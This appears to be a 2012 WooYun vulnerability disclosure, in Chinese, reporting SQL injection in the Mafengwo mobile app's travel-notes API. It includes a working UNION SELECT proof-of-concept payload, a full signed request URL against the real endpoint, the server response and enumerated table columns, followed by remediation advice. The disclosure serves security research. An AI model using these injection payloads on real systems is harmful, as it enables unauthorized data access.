当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-04324

漏洞标题:蚂蜂窝手机应用背后的HTTP API接口存在SQL注入漏洞

相关厂商:蚂蜂窝

漏洞作者: horseluke

提交时间:2012-02-08 15:35

修复时间:2012-03-24 15:36

公开时间:2012-03-24 15:36

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-02-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-03-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

蚂蜂窝手机应用背后的HTTP API接口存在SQL注入漏洞。
同时在这里,非常严肃非常严肃地提醒所有手机应用的开发者,在开发对应的与服务器通讯的API接口时,不要认为加密数据传输就能安全大吉、对参数不加验证就使用!

详细说明:

蚂蜂窝有几个手机应用,其中之一为旅行家游记。
通过反编译apk,发现其与服务器的HTTP API通讯接口:
http://www.mafengwo.cn/mobile/travelnotes/gettravels.php
虽然通讯过程采取了加密数据传输,但很容易模拟;其中通讯参数travels_id未经验证即进入SQL查询,导致SQL注入产生。

漏洞证明:

1、POC:
travels_id为“778079 and 1=2 union select 0,char(97,98,97,98,97,97,97,98,98,98,97,99,97),0,0,0,0,0,0,0,0,0,0--”(不含双引号)时的URL:

http://www.mafengwo.cn/mobile/travelnotes/gettravels.php?r=%7B%22sign%22%3A%22f7c8542ddf4533a09874d4f829123049%22%2C%22data%22%3A%7B%22travels_id%22%3A%22778079+and+1%3D2+union+select+0%2Cchar%2897%2C98%2C97%2C98%2C97%2C97%2C97%2C98%2C98%2C98%2C97%2C99%2C97%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0--%22%2C%22device_id%22%3A%22a984355c5vt74g%22%7D%7D


返回:

{"data":{"ret":1,"message":{"id":"ababaaabbbaca","content":"0","img_width":320,"img_list":[]}},"sign":"82b60326ab8a7bd4eb43912d371b34d0"}


2、证明注入问题存在证据:表travelguide_book含如下列:
id,p_mddid,mddid,name,p_mdd_name,mdd_name,icon,icon_big,ver,type,fee,product_id,file,size,password,publish,download,ob,ctime,lasttime

修复方案:

检查所有API接口,是否存在未检查参数等(在普通页面已执行但API层未执行的安全措施)的漏洞。
其余建议见“问题描述”。
另外给数个漏洞外的建议:
(1)请关闭服务器的错误显示
(2)请尽快升级用户系统,原因和CSDN历史问题相似

版权声明:转载请注明来源 horseluke@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)